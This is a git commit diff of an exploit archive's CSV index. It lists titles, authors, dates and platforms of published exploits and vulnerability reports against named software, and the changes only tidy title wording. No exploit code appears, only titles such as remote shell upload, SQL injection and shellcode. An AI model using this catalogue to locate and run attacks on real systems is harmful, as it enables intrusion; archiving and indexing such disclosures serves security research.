DB: 2015-10-02

9 new exploits
2015-10-02 05:02:31 +00:00 · 2015-10-02 05:02:31 +00:00 · 09104c8692
commit 09104c8692
parent 7fcce7a954
25 changed files with 1042 additions and 555 deletions
--- a/files.csv
+++ b/files.csv
@ -1225,7 +1225,7 @@ id,file,description,date,author,platform,type,port
 1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (osx)",2006-02-08,"H D Moore",osx,remote,0
 1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0
 1482,platforms/php/webapps/1482.php,"SPIP <= 1.8.2g Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
-1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (non steam) Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0
+1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server <= 1.6 (Non Steam) - Denial of Service Exploit",2006-02-11,Firestorm,multiple,dos,0
 1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager - connector.php) Remote Shell Upload Exploit",2006-02-09,rgod,php,webapps,0
 1485,platforms/php/webapps/1485.php,"RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit",2006-02-09,rgod,php,webapps,0
 1486,platforms/linux/remote/1486.c,"Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532
@ -3094,7 +3094,7 @@ id,file,description,date,author,platform,type,port
 3427,platforms/linux/local/3427.php,"PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure Exploit",2007-03-07,"Stefan Esser",linux,local,0
 3428,platforms/php/webapps/3428.txt,"Flat Chat 2.0 (include online.txt) Remote Code Execution Vulnerability",2007-03-07,Dj7xpl,php,webapps,0
 3429,platforms/windows/local/3429.php,"PHP COM extensions (inconsistent Win32) safe_mode Bypass Exploit",2007-03-07,N/A,windows,local,0
-3430,platforms/windows/dos/3430.html,"Adobe Reader plug-in AcroPDF.dll 8.0.0.0 Resource Consumption",2007-03-08,shinnai,windows,dos,0
+3430,platforms/windows/dos/3430.html,"Adobe Reader plugin AcroPDF.dll 8.0.0.0 - Resource Consumption",2007-03-08,shinnai,windows,dos,0
 3431,platforms/windows/local/3431.php,"PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC",2007-03-08,rgod,windows,local,0
 3432,platforms/windows/dos/3432.pl,"TFTPDWIN Server 0.4.2 - (UDP) Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0
 3433,platforms/windows/dos/3433.html,"Rediff Toolbar ActiveX Control Remote Denial of Service Exploit",2007-03-08,"Umesh Wanve",windows,dos,0
@ -3818,7 +3818,7 @@ id,file,description,date,author,platform,type,port
 4170,platforms/windows/remote/4170.html,"Program Checker (sasatl.dll 1.5.0.531) Javascript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0
 4171,platforms/php/webapps/4171.pl,"Mail Machine <= 3.989 - Local File Inclusion Exploit",2007-07-10,"H4 / XPK",php,webapps,0
 4172,platforms/linux/local/4172.c,"Linux Kernel < 2.6.20.2 - IPv6_Getsockopt_Sticky Memory Leak PoC",2007-07-10,dreyer,linux,local,0
-4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln",2007-07-11,jmp-esp,php,webapps,0
+4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution Vuln",2007-07-11,jmp-esp,php,webapps,0
 4174,platforms/php/webapps/4174.txt,"PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability",2007-07-12,irk4z,php,webapps,0
 4175,platforms/multiple/dos/4175.php,"PHP 5.2.3 bz2 com_print_typeinfo() Denial of Service Exploit",2007-07-12,shinnai,multiple,dos,0
 4176,platforms/windows/remote/4176.html,"SecureBlackbox (PGPBBox.dll 5.1.0.112) Arbitary Data Write Exploit",2007-07-12,callAX,windows,remote,0
@ -5047,7 +5047,7 @@ id,file,description,date,author,platform,type,port
 5414,platforms/php/webapps/5414.txt,"Koobi Pro 6.25 showimages Remote SQL Injection Vulnerability",2008-04-08,S@BUN,php,webapps,0
 5415,platforms/php/webapps/5415.txt,"Koobi 4.4/5.4 gallery Remote SQL Injection Vulnerability",2008-04-08,S@BUN,php,webapps,0
 5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0
-5417,platforms/php/webapps/5417.htm,"phpBB Add-on Fishing Cat Portal Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0
+5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0
 5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin Exploit",2008-04-09,t0pP8uZz,php,webapps,0
 5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure Vulnerability",2008-04-09,JIKO,php,webapps,0
 5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) - Remote File Disclosure Vulnerability",2008-04-09,HaCkeR_EgY,php,webapps,0
@ -8414,7 +8414,7 @@ id,file,description,date,author,platform,type,port
 8919,platforms/php/webapps/8919.txt,"Joomla Component com_realestatemanager 1.0 RFI Vulnerability",2009-06-09,"Mehmet Ince",php,webapps,0
 8920,platforms/php/webapps/8920.txt,"Joomla Component com_vehiclemanager 1.0 RFI Vulnerability",2009-06-09,"Mehmet Ince",php,webapps,0
 8921,platforms/php/webapps/8921.sh,"phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit",2009-06-09,"Adrian ""pagvac"" Pastor",php,webapps,0
-8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plug-in Command Injection Vuln",2009-06-10,"Core Security",windows,remote,0
+8922,platforms/windows/remote/8922.txt,"DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection Vuln",2009-06-10,"Core Security",windows,remote,0
 8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db <= 2.2.x system Config Disclosure Exploit",2009-06-10,StAkeR,php,webapps,0
 8924,platforms/php/webapps/8924.txt,"School Data Navigator (page) Local/Remote File Inclusion Vulnerability",2009-06-10,Br0ly,php,webapps,0
 8925,platforms/php/webapps/8925.txt,"Desi Short URL Script (Auth Bypass) Insecure Cookie Handling Vuln",2009-06-10,N@bilX,php,webapps,0
@ -8456,7 +8456,7 @@ id,file,description,date,author,platform,type,port
 8962,platforms/php/webapps/8962.txt,"phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln",2009-06-15,SirGod,php,webapps,0
 8963,platforms/hardware/remote/8963.txt,"Netgear DG632 Router Authentication Bypass Vulnerability",2009-06-15,"Tom Neaves",hardware,remote,0
 8964,platforms/hardware/dos/8964.txt,"Netgear DG632 Router Remote Denial of Service Vulnerability",2009-06-15,"Tom Neaves",hardware,dos,0
-8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player Add-On HTML Injection Vulnerability",2009-06-15,d3v1l,php,webapps,0
+8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection Vulnerability",2009-06-15,d3v1l,php,webapps,0
 8966,platforms/php/webapps/8966.txt,"phportal 1 - (topicler.php id) Remote SQL Injection Vulnerability",2009-06-15,"Mehmet Ince",php,webapps,0
 8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Remote XSS Vulnerability",2009-06-15,"ThE g0bL!N",php,webapps,0
 8968,platforms/php/webapps/8968.txt,"Joomla Component com_jumi (fileid) Blind SQL Injection Exploit",2009-06-15,"Chip d3 bi0s",php,webapps,0
@ -12475,7 +12475,7 @@ id,file,description,date,author,platform,type,port
 14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - (fckeditor) Remote File Upload",2010-07-03,ITSecTeam,php,webapps,0
 14185,platforms/multiple/dos/14185.py,"ISC-DHCPD Denial of Service",2010-07-03,sid,multiple,dos,0
 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0
-14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting Add-On Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0
+14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion Vulnerability",2010-07-03,lumut--,php,webapps,0
 14187,platforms/php/webapps/14187.txt,"Joomla eventcal Component 1.6.4 com_eventcal Blind SQL Injection Vulnerability",2010-07-03,RoAd_KiLlEr,php,webapps,0
 14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - CSRF Add FTP Account Exploit",2010-07-03,G0D-F4Th3r,php,webapps,0
 14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL); - XOR 88 encoded (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0
@ -16402,7 +16402,7 @@ id,file,description,date,author,platform,type,port
 18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow",2012-06-01,metasploit,windows,remote,0
 18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0
 18973,platforms/windows/remote/18973.rb,"GIMP script-fu Server Buffer Overflow",2012-06-02,metasploit,windows,remote,0
-18974,platforms/php/webapps/18974.txt,"vanilla forum tagging plug-in enchanced 1.0.1 - Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0
+18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0
 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog <= 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0
 18987,platforms/php/webapps/18987.php,"Wordpress WP-Property Plugin 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0
 18988,platforms/php/webapps/18988.php,"Wordpress Plugin Marketplace Plugin 1.5.0 - 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0
@ -19395,11 +19395,11 @@ id,file,description,date,author,platform,type,port
 22135,platforms/linux/remote/22135.c,"TANne 0.6.17 Session Manager SysLog Format String Vulnerability",2003-01-07,"dong-h0un yoU",linux,remote,0
 22136,platforms/windows/remote/22136.txt,"PlatinumFTPServer 1.0.6 Dot-Dot-Slash Directory Traversal Vulnerability",2003-01-07,"Dennis Rand",windows,remote,0
 22137,platforms/cgi/webapps/22137.txt,"FormMail-Clone Cross-Site Scripting Vulnerability",2003-01-09,"Rynho Zeros Web",cgi,webapps,0
-22138,platforms/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plug-in CMD_ARGV Buffer Overflow Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
+22138,platforms/multiple/remote/22138.c,"Half-Life StatsMe 2.6.x Plugin - CMD_ARGV Buffer Overflow Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
-22139,platforms/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin Remote Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
+22139,platforms/multiple/remote/22139.c,"Half-Life ClanMod 1.80/1.81 Plugin - Remote Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
-22140,platforms/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plug-in MakeStats Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
+22140,platforms/multiple/remote/22140.c,"Half-Life StatsMe 2.6.x Plugin - MakeStats Format String Vulnerability",2003-01-10,greuff@void.at,multiple,remote,0
-22141,platforms/linux/remote/22141.c,"Half-Life AdminMod 2.50 Plugin Remote Format String Vulnerability",2003-01-10,greuff,linux,remote,0
+22141,platforms/linux/remote/22141.c,"Half-Life AdminMod 2.50 Plugin - Remote Format String Vulnerability",2003-01-10,greuff,linux,remote,0
-22142,platforms/windows/remote/22142.c,"Half-Life 1.1 Client Server Message Format String Vulnerability",2003-01-10,greuff,windows,remote,0
+22142,platforms/windows/remote/22142.c,"Half-Life 1.1 Client - Server Message Format String Vulnerability",2003-01-10,greuff,windows,remote,0
 22143,platforms/linux/remote/22143.txt,"BRS WebWeaver 1.0 1 MKDir Directory Traversal Weakness",2003-01-10,euronymous,linux,remote,0
 22144,platforms/windows/remote/22144.txt,"Xynph FTP Server 1.0 Relative Path Directory Traversal Vulnerability",2003-01-11,"Zero-X www.lobnan.de Team",windows,remote,0
 22145,platforms/multiple/remote/22145.txt,"BitMover BitKeeper 3.0 Daemon Mode Remote Command Execution Vulnerability",2003-01-11,"Maurycy Prodeus ",multiple,remote,0
@ -20176,10 +20176,10 @@ id,file,description,date,author,platform,type,port
 22963,platforms/cgi/webapps/22963.txt,"Softshoe Parse-file Cross-Site Scripting Vulnerability",2003-07-28,"Bahaa Naamneh",cgi,webapps,0
 22964,platforms/unix/remote/22964.c,"Mini SQL 1.0/1.3 - Remote Format String Vulnerability",2003-07-28,lucipher,unix,remote,0
 22965,platforms/linux/local/22965.c,"XBlast 2.6.1 HOME Environment Variable Buffer Overflow Vulnerability",2003-07-28,c0wboy,linux,local,0
-22966,platforms/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client Connection Routine Buffer Overflow Vulnerability (1)",2003-07-29,D4rkGr3y,windows,remote,0
+22966,platforms/windows/remote/22966.c,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow Vulnerability (1)",2003-07-29,D4rkGr3y,windows,remote,0
 22940,platforms/php/webapps/22940.txt,"Drupal 4.1/4.2 - Cross-Site Scripting Vulnerability",2003-07-21,"Ferruh Mavituna",php,webapps,0
 22941,platforms/php/webapps/22941.txt,"atomicboard 0.6.2 - Directory Traversal Vulnerability",2003-07-21,gr00vy,php,webapps,0
-22967,platforms/windows/remote/22967.txt,"Valve Software Half-Life 1.1 Client Connection Routine Buffer Overflow Vulnerability (2)",2003-07-29,anonymous,windows,remote,0
+22967,platforms/windows/remote/22967.txt,"Valve Software Half-Life 1.1 Client - Connection Routine Buffer Overflow Vulnerability (2)",2003-07-29,anonymous,windows,remote,0
 22968,platforms/linux/remote/22968.c,"Valve Software Half-Life Server <= 1.1.1.0 & 3.1.1.1c1 &4.1.1.1a - Multiplayer Request Buffer Overflow",2003-07-29,hkvig,linux,remote,0
 22917,platforms/windows/remote/22917.txt,"Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability",2003-08-11,aT4r@3wdesign.es,windows,remote,0
 22918,platforms/unix/dos/22918.txt,"IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow Vulnerability",2003-07-16,kf,unix,dos,0
@ -20424,7 +20424,7 @@ id,file,description,date,author,platform,type,port
 23195,platforms/asp/webapps/23195.txt,"Alan Ward A-Cart 2.0 MSG Cross-Site Scripting Vulnerability",2003-09-29,G00db0y,asp,webapps,0
 23196,platforms/linux/remote/23196.c,"WebFS 1.x Long Pathname Buffer Overrun Vulnerability",2003-09-29,jsk,linux,remote,0
 23197,platforms/linux/local/23197.c,"Mah-Jong 1.4 MJ-Player Server Flag Local Buffer Overflow Vulnerability",2003-09-29,jsk,linux,local,0
-23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 Invalid Command Error Response Format String Vulnerability",2003-09-29,"Luigi Auriemma",windows,remote,0
+23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 - Invalid Command Error Response Format String Vulnerability",2003-09-29,"Luigi Auriemma",windows,remote,0
 23199,platforms/multiple/remote/23199.c,"OpenSSL ASN.1 Parsing Vulnerabilities",2003-10-09,Syzop,multiple,remote,0
 23200,platforms/linux/dos/23200.txt,"Gamespy 3d 2.62/2.63 IRC Client Remote Buffer Overflow Vulnerability",2003-09-30,"Luigi Auriemma",linux,dos,0
 23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 - (.swf) Crash PoC",2012-12-07,coolkaveh,windows,dos,0
@ -20491,12 +20491,12 @@ id,file,description,date,author,platform,type,port
 23262,platforms/jsp/webapps/23262.txt,"Caucho Resin 2.0/2.1 - Multiple HTML Injection and Cross-Site Scripting Vulnerabilities",2003-10-20,"Donnie Werner",jsp,webapps,0
 23263,platforms/multiple/dos/23263.txt,"Opera 7.11/7.20 HREF Malformed Server Name Heap Corruption Vulnerability",2003-10-20,@stake,multiple,dos,0
 23264,platforms/php/webapps/23264.txt,"DeskPro 1.1 - Multiple SQL Injection Vulnerabilities",2003-10-20,"Aviram Jenik",php,webapps,0
-23265,platforms/windows/remote/23265.txt,"Sun Java Plug-In 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation Vulnerability",2003-10-20,"Marc Schoenefeld",windows,remote,0
+23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation Vulnerability",2003-10-20,"Marc Schoenefeld",windows,remote,0
 23266,platforms/cgi/webapps/23266.txt,"Dansie Shopping Cart Server Error Message Installation Path Disclosure Vulnerability",2003-10-20,Dr`Ponidi,cgi,webapps,0
 23267,platforms/windows/dos/23267.txt,"Atrium Software Mercur Mailserver 3.3/4.0/4.2 IMAP AUTH Remote Buffer Overflow Vulnerability",2003-10-20,"Kostya KORTCHINSKY",windows,dos,0
 23268,platforms/java/webapps/23268.txt,"Vivisimo Clustering Engine - Search Script Cross-Site Scripting Vulnerability",2003-10-21,ComSec,java,webapps,0
 23269,platforms/php/webapps/23269.txt,"FuzzyMonkey 2.11 MyClassifieds Email Variable SQL Injection Vulnerability",2003-10-21,Ezhilan,php,webapps,0
-23270,platforms/windows/remote/23270.java,"Sun Java Plug-In 1.4 Unauthorized Java Applet Floppy Access Weakness",2003-10-21,"Marc Schoenefeld",windows,remote,0
+23270,platforms/windows/remote/23270.java,"Sun Java Plugin 1.4 - Unauthorized Java Applet Floppy Access Weakness",2003-10-21,"Marc Schoenefeld",windows,remote,0
 23271,platforms/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin Cross-Site Scripting Vulnerability",2003-10-22,SecuriTeam,multiple,remote,0
 23272,platforms/solaris/remote/23272.txt,"Sun Management Center 3.0/3.5 Error Message Information Disclosure Vulnerability",2003-10-22,"Jon Hart",solaris,remote,0
 23273,platforms/windows/dos/23273.html,"Microsoft Internet Explorer 6.0 Scrollbar-Base-Color Partial Denial of Service Vulnerability",2003-10-22,"Andreas Boeckler",windows,dos,0
@ -20504,7 +20504,7 @@ id,file,description,date,author,platform,type,port
 23275,platforms/cgi/webapps/23275.txt,"DansGuardian 2.2.x Denied URL Cross-Site Scripting Vulnerability",2003-10-22,"Richard Maudsley",cgi,webapps,0
 23276,platforms/multiple/dos/23276.java,"Sun Java Virtual Machine 1.x Slash Path Security Model Circumvention Vulnerability",2003-10-22,"Last Stage of Delirium",multiple,dos,0
 23387,platforms/windows/remote/23387.txt,"netserve Web server 1.0.7 - Directory Traversal Vulnerability",2003-11-17,nimber@designer.ru,windows,remote,0
-23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 Information Disclosure/DOS Vulnerability",2003-11-19,3APA3A,windows,dos,0
+23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 - Information Disclosure/DOS Vulnerability",2003-11-19,3APA3A,windows,dos,0
 23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl Local Denial of Service Vulnerability",2003-11-19,anonymous,openbsd,dos,0
 23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0
 23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0
@ -21114,7 +21114,7 @@ id,file,description,date,author,platform,type,port
 23909,platforms/windows/remote/23909.txt,"ada imgsvr 0.4 - Directory Traversal Vulnerability",2004-04-05,dr_insane,windows,remote,0
 23910,platforms/windows/local/23910.txt,"F-Secure BackWeb 6.31 - Local Privilege Escalation Vulnerability",2004-04-06,"Ian Vitek",windows,local,0
 23911,platforms/windows/dos/23911.txt,"Microsoft Internet Explorer 6.0 MSWebDVD Object Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0
-23912,platforms/windows/dos/23912.txt,"Microsoft Internet Explorer 6.0 Macromedia Flash Player Plug-in Remote Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0
+23912,platforms/windows/dos/23912.txt,"Microsoft Internet Explorer 6.0 Macromedia Flash Player Plugin - Remote Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0
 23913,platforms/cgi/webapps/23913.txt,"Floosietek FTGate Mail Server 1.2 index.fts folder Parameter XSS",2004-04-06,dr_insane,cgi,webapps,0
 23914,platforms/cgi/webapps/23914.txt,"Floosietek FTGate Mail Server 1.2 Path Disclosure Vulnerability",2004-04-06,dr_insane,cgi,webapps,0
 23915,platforms/windows/dos/23915.txt,"Adobe Photoshop 8.0 COM Objects Denial of Service Vulnerability",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0
@ -21193,7 +21193,7 @@ id,file,description,date,author,platform,type,port
 23998,platforms/php/webapps/23998.txt,"PHP-Nuke 6.x/7.x - Multiple SQL Injection Vulnerabilities",2004-04-13,waraxe,php,webapps,0
 23999,platforms/linux/dos/23999.txt,"Neon WebDAV Client Library 0.2x Format String Vulnerabilities",2004-04-14,"Thomas Wana",linux,dos,0
 24000,platforms/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 MIME Message Nesting Denial of Service Vulnerability",2004-04-14,"Paul Szabo",windows,dos,0
-23993,platforms/php/webapps/23993.txt,"websitebaker add-on concert calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0
+23993,platforms/php/webapps/23993.txt,"Websitebaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0
 23994,platforms/php/webapps/23994.txt,"Free Blog 1.0 - Multiple Vulnerabilities",2013-01-09,"cr4wl3r ",php,webapps,0
 23995,platforms/hardware/webapps/23995.txt,"Watson Management Console 4.11.2.G Directory Traversal Vulnerability",2013-01-09,"Dhruv Shah",hardware,webapps,0
 23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - (.jpeg) Exploit",2013-01-09,"Debasish Mandal",windows,local,0
@ -21576,7 +21576,7 @@ id,file,description,date,author,platform,type,port
 24385,platforms/asp/webapps/24385.txt,"Zixforum ZixForum.mdb Database Disclosure Vulnerability",2004-07-19,"Security .Net Information",asp,webapps,0
 24386,platforms/multiple/dos/24386.txt,"British National Corpus SARA - Remote Buffer Overflow Vulnerability",2004-07-20,"Matthias Bethke",multiple,dos,0
 24387,platforms/multiple/remote/24387.txt,"Nihuo Web Log Analyzer 1.6 HTML Injection Vulnerability",2004-08-20,"Audun Larsen",multiple,remote,0
-24388,platforms/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server Info Response Buffer Overflow Vulnerability",2004-08-20,Dimetrius,multiple,dos,0
+24388,platforms/multiple/dos/24388.txt,"aGSM 2.35 Half-Life Server - Info Response Buffer Overflow Vulnerability",2004-08-20,Dimetrius,multiple,dos,0
 24389,platforms/php/webapps/24389.txt,"Sympa 4.x New List HTML Injection Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0
 24390,platforms/php/webapps/24390.txt,"Mantis 0.19 - Remote Server-Side Script Execution Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0
 24391,platforms/php/webapps/24391.txt,"Mantis 0.x - Multiple Cross-Site Scripting Vulnerabilities",2004-08-21,"Jose Antonio",php,webapps,0
@ -21922,7 +21922,7 @@ id,file,description,date,author,platform,type,port
 24760,platforms/hardware/remote/24760.txt,"ZyXEL 3 Prestige Router HTTP Remote Administration Configuration Reset Vulnerability",2004-11-22,"Francisco Canela",hardware,remote,0
 24761,platforms/multiple/dos/24761.txt,"Gearbox Software Halo Game 1.x Client Remote Denial of Service Vulnerability",2004-11-22,"Luigi Auriemma",multiple,dos,0
 24762,platforms/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,php,webapps,0
-24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plug-in JavaScript Security Restriction Bypass Vulnerability",2004-11-22,"Jouko Pynnonen",multiple,dos,0
+24763,platforms/multiple/dos/24763.txt,"Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass Vulnerability",2004-11-22,"Jouko Pynnonen",multiple,dos,0
 24854,platforms/php/dos/24854.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (1)",2004-12-15,"Stefan Esser",php,dos,0
 24766,platforms/php/webapps/24766.txt,"NuKed-Klan 1.x Submit Link Function HTML Injection Vulnerability",2004-11-23,XioNoX,php,webapps,0
 24767,platforms/windows/remote/24767.txt,"Raven Software Soldier Of Fortune 2 - Buffer Overflow Vulnerability",2004-11-23,"Luigi Auriemma",windows,remote,0
@ -22855,7 +22855,7 @@ id,file,description,date,author,platform,type,port
 25707,platforms/linux/local/25707.txt,"Linux Kernel 2.6.x - Cryptoloop Information Disclosure Vulnerability",2005-05-26,"Markku-Juhani O. Saarinen",linux,local,0
 25708,platforms/multiple/remote/25708.txt,"Clever's Games Terminator 3: War of the Machines 1.16 Server Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0
 25709,platforms/linux/local/25709.sh,"Gentoo Webapp-Config 1.10 Insecure File Creation Vulnerability",2005-05-26,"Eric Romang",linux,local,0
-25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plug-in Read_TCP_String Remote Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0
+25710,platforms/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plugin - Read_TCP_String Remote Buffer Overflow Vulnerability",2005-05-26,"Luigi Auriemma",multiple,remote,0
 25711,platforms/hardware/dos/25711.txt,"Sony Ericsson P900 Beamer Malformed File Name Handling Denial of Service Vulnerability",2005-05-26,"Marek Bialoglowy",hardware,dos,0
 25712,platforms/windows/dos/25712.txt,"SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite RCE",2013-05-26,rgod,windows,dos,0
 25713,platforms/windows/remote/25713.txt,"SIEMENS Solid Edge ST4/ST5 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx RCE",2013-05-26,rgod,windows,remote,0
@ -23097,7 +23097,7 @@ id,file,description,date,author,platform,type,port
 25945,platforms/php/webapps/25945.txt,"phpWebsite 0.7.3/0.8.x/0.9.x Index.PHP Directory Traversal Vulnerability",2005-07-06,"Diabolic Crab",php,webapps,0
 25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0
 25947,platforms/linux/local/25947.txt,"GNU GNATS 4.0/4.1 - Gen-Index Arbitrary Local File Disclosure/Overwrite Vulnerability",2005-07-06,pi3ki31ny,linux,local,0
-25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 Plug-In Insecure File Download Handling Vulnerability",2005-07-06,c0ntex,cgi,webapps,0
+25950,platforms/cgi/webapps/25950.pl,"eRoom 6.0 PlugIn - Insecure File Download Handling Vulnerability",2005-07-06,c0ntex,cgi,webapps,0
 25951,platforms/php/webapps/25951.txt,"Elemental Software CartWIZ 1.20 - Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",php,webapps,0
 25952,platforms/cgi/webapps/25952.txt,"Pngren 2.0.1 Kaiseki.CGI Remote Command Execution Vulnerability",2005-07-07,blahplok,cgi,webapps,0
 25953,platforms/asp/webapps/25953.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple SQL Injection Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0
@ -25693,7 +25693,7 @@ id,file,description,date,author,platform,type,port
 28636,platforms/php/webapps/28636.txt,"Grayscale BandSite CMS 1.1 shows_content.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0
 28637,platforms/php/webapps/28637.txt,"Grayscale BandSite CMS 1.1 signgbook_content.php the_band Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0
 28638,platforms/php/webapps/28638.txt,"Grayscale BandSite CMS 1.1 footer.php this_year Parameter XSS",2006-09-21,"HACKERS PAL",php,webapps,0
-28639,platforms/linux/remote/28639.rb,"Apple QuickTime 7.1.3 Plug-In Arbitrary Script Execution Weakness",2006-09-21,LMH,linux,remote,0
+28639,platforms/linux/remote/28639.rb,"Apple QuickTime 7.1.3 PlugIn - Arbitrary Script Execution Weakness",2006-09-21,LMH,linux,remote,0
 28640,platforms/windows/remote/28640.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Web Server Path Disclosure",2006-09-21,"Patrick Webster",windows,remote,0
 28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Unspecified Arbitrary File Manipulation",2006-09-21,"Patrick Webster",windows,remote,0
